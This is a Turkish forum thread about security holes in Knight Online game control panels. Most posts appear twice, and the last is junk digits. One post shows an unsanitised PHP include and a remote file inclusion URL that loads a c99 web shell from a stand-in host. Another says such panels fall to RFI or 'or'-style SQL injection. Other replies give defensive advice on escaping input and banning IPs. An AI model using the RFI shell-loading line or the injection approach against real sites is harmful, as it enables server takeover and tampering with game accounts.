Kopanel Açıkları
- Konbuyu başlatan TaSo
- Başlangıç tarihi
Cevap: Kopanel Açıkları
Include($_GET["sayfa"]); RFİ genel acik veren kod budur arkada$ım .
Mesala Bu Kod kayit.php de geciyorsa ;
site.com/kayit.php?sayfa=http://shelladresi.com/c99.txt? şeklinde caqırabiLiyor .
Egerki dosyalarinda 777 ise direk hacklerler , bu işlerle baya ugraşdim inş yardimci olmusumdur.
ki bunun host güvenligi var eger hostun safe mode off ise baska sitelere sokulan shellerden dizin okunarak senin sitenede erisim saglanabiliyor . dikkatli olmaniz dilegiyle.
Include($_GET["sayfa"]); RFİ genel acik veren kod budur arkada$ım .
Mesala Bu Kod kayit.php de geciyorsa ;
site.com/kayit.php?sayfa=http://shelladresi.com/c99.txt? şeklinde caqırabiLiyor .
Egerki dosyalarinda 777 ise direk hacklerler , bu işlerle baya ugraşdim inş yardimci olmusumdur.
ki bunun host güvenligi var eger hostun safe mode off ise baska sitelere sokulan shellerden dizin okunarak senin sitenede erisim saglanabiliyor . dikkatli olmaniz dilegiyle.
Cevap: Kopanel Açıkları
hiç bişey anlamadım desem :s
aslında ss li cevaplama yöntemi en etkilisidir bi zahmet öyle cevaplasak
hiç bişey anlamadım desem :s
aslında ss li cevaplama yöntemi en etkilisidir bi zahmet öyle cevaplasak
Cevap: Kopanel Açıkları
bir yandan haklısın aslında sadece clan ve userrank gosterecen o kadarı yeterLi
e biz direk paneli kapatalm o zmn
bir yandan haklısın aslında sadece clan ve userrank gosterecen o kadarı yeterLi
Cevap: Kopanel Açıkları
valla kardeş en güvenli kopanel yapmak istiyorsan admin gm yetkileri olmucak kopanelde login olmucak bide indexte ip ban kodu olucak kıssacası ping veya saldırınca direk ip ban atıcak onuda bi not defterine kaydediyor hangi ipten saldırdıklarını
valla kardeş en güvenli kopanel yapmak istiyorsan admin gm yetkileri olmucak kopanelde login olmucak bide indexte ip ban kodu olucak kıssacası ping veya saldırınca direk ip ban atıcak onuda bi not defterine kaydediyor hangi ipten saldırdıklarını
Cevap: Kopanel Açıkları
Ko panelde login girişi, admin paneli veya gm paneli olması açık var anlamına gelmez.Tek açık texbox lardan gelen verinin filtrelenmemesidir.POST metoduyla gelen bütün isteklerin bir süzgeçden geçirilmesi yani escape edilerek zararsız hale getirilmesi bu açıkları rahatlıkla kapatır.Bu konu hakkında yardım isteyen olursa yardım edebilirim.İyi forumlar.
Ko panelde login girişi, admin paneli veya gm paneli olması açık var anlamına gelmez.Tek açık texbox lardan gelen verinin filtrelenmemesidir.POST metoduyla gelen bütün isteklerin bir süzgeçden geçirilmesi yani escape edilerek zararsız hale getirilmesi bu açıkları rahatlıkla kapatır.Bu konu hakkında yardım isteyen olursa yardım edebilirim.İyi forumlar.
- Tem
- 54
- 0
Cevap: Kopanel Açıkları
panel hacklemek için injectiona gerek yok
eğer login.php varsa RFI ile 5 dakika içinde hacklersiniz hiç sorun olmaz.
RFI dan çakmıyosanız 'or' gibi 50 tane kod denersiniz gene hacklersiniz.
Login.php kayit.php kapalıysa injectionla bumlatırsınız.Tabi bu hacklemek sayılmaz.En fazla kendi charınızı gm,edit yaparsınız falan.İşte Queryde yaratabildiğiniz en yaratıcı kodu kendi charınıza uygulayabilirsiniz.Ötesi yok karşı bilgisayarı ele geçiremezsiniz.
panel hacklemek için injectiona gerek yok
eğer login.php varsa RFI ile 5 dakika içinde hacklersiniz hiç sorun olmaz.
RFI dan çakmıyosanız 'or' gibi 50 tane kod denersiniz gene hacklersiniz.
Login.php kayit.php kapalıysa injectionla bumlatırsınız.Tabi bu hacklemek sayılmaz.En fazla kendi charınızı gm,edit yaparsınız falan.İşte Queryde yaratabildiğiniz en yaratıcı kodu kendi charınıza uygulayabilirsiniz.Ötesi yok karşı bilgisayarı ele geçiremezsiniz.
yolkesenf9
Member
- May
- 116
- 4
Cevap: Kopanel Açıkları
evet katılıyorum 2 gündür ordan saldırıyolardı net gidiyodu yawaslıodu sildm bisi kalmadıqm VE Admin paneli olmadı sürece sorun yok
DontTouchViagraa
New Member
- Mar
- 13
- 0
Cevap: Kopanel Açıkları
2222222222222222222222222
2222222222222222222222222
